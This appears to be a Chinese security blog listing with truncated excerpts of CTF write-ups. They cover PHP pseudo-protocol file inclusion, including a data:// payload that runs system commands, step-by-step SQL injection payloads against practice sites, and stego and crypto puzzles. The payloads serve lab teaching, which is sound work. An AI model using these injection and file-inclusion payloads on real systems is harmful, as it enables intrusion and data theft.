6cc84a796f48abb446169148f30fe28fbeeb52ad17fbd53b0ab91890865402a131965580310d996486109ee9f6b9cd05589322ee51e6a7a3aa4846b747a249db761466238ef67c688848bda721533dc71a8a9e75bfe1a172832db88f8df6ee34bf9904d275070bc8e66cf6b41096563e261fba6707737e335b502a945774aa38702000ec60b1020e797f0b5ccb6f8373b3141785c43571cbe5cf9360c4fb1bd3bc35ff77aff7e6c762bd93a9c8270b40ecd1ea52bca539347d7cceb836929d226fb9854593c8b457f1462f1e1cc248df55d5d6255e35674b5daf0528221a82f61a7cbf4dd2d91245b4cee9a37998c257057ab5bf154c55e18 ...
文件包含与php伪协议原理
常用场景:文件包含 ,文本包含
常用的伪协议有
php://filter 读取文件源码 (协议可以对打开的数据流进行筛选和过滤,常用于读取文件源码)
php://input 任意代码执行;这种伪协议用于读取原始的 HTTP POST 数据,可以用于处理上传的文件和表单数据。
data://text/plain; 任意代码执行
zip:// 配合文件上传开启后门
若过滤了 ‘php’,使用以下方式绕过。
1、data://协议 + PHP短标签:
1?file=data://text/plain,<?='tac flag.php'?>
2、data://协议 + base64编码:
1?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhZy5waHAnKTs/Pg==
3、php://input协议大 ...
这是我的第一篇博客你好,今天是2025年6月7日
青少年CTF练习平台-web1.文章管理系统
抓包访问页面发现页面 id 参数存在整形 sql 注入
Payload:
12345678910?id=1?id=1' //判断为整数类型的注入?id=1 and 1=1# //正常执行?id=1 and 1=2# //返回报错,证明存在注入?id=1 order by 2# //查看显示位,有两列?id=-1 union select database(),user()# //word,root@localhost?id=-1 union select version(),@@datadir# //数据库版本和安装路径?id=-1 union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),user()# //articles?id=-1 union select (select group_concat(column_name ...
zkaq-CTF靶场-Misc+OSINT1.杂项1:图片隐写
打开后是个图片:ctf-1.jpg
下载下来使用kali分析一下,使用 strings命令查看下
1strings ctf-1.jpg
在结果最后处看到一段Unicode编码内容:
1key{z-nsdiua}
复制出来保存为 1.html使用浏览器打开后发现flag
2.杂项2:密文在这里,看看你是否能解开
提示: 重复敲击两次,密码是6位数
描述: M6UUSlt6rxWO328Kez8xXCMd,这是一段RC4加密,但是我总是解不开呢,这时有一个声音在你耳边响起,rtygcvb,ujmko,ujmko,他代表什么意思呢?
RC4有密码,仔细观察,rtygcvb和ujmko在键盘上是这样的
密码可能是:zvvzvv,使用在线解码网站解密得到
http://tool.chac ...
zkaq-CTF靶场-2月靶场1.伪协议(考点:伪协议读取、系统进程)123456<?phphighlight_file(__FILE__);require_once 'flag.php';if(isset($_GET['file'])) { require_once $_GET['file'];}
看到require_once使用伪协议读取系统文件
知识点: 在php中,require_once在调用时php会检查该文件是否已经被包含过,如果是则不会再次包含,php的文件包含机制是将已经包含的文件与文件的真实路径放进哈希表中,当已经require_once('flag.php'),已经include的文件不可以再require_once。
设想如何绕过这个哈希表,让php认为我们传入的文件名不在哈希表中,又可以让php能找到这个文件,读取到内容。
在这里有个小知识点,/proc/self指向当前进程的/proc/pid/,/proc/self/root/是指向/的符号链接,想 ...
BugKu-web-免费真题题目地址https://ctf.bugku.com/challenges/index/gid/2/tid/1.html
1.inspect-me
查看网页源代码发现flag
2.my-first-sqli
描 述: My First SQL injection!!
SQL注入题:输入框输入单引号会报错
SQLite3::SQLException: near “123”: syntax error
用户名或密码区输入:-123' union select 1,1--+点击登录直接跳转出现flag
1shellmates{SQLi_goeS_BrrRrRR}
3.post-the-get
描 述: A simple form to fill, nothing special right?
输入任意用户名和密码,发现无法点击提交发送按钮。
将form表单改一下,把请求方式GET改成POST,把disable改成enable,再点击发送按钮即可获得flag
4.sqli-0x1
描 述: SQL inj ...





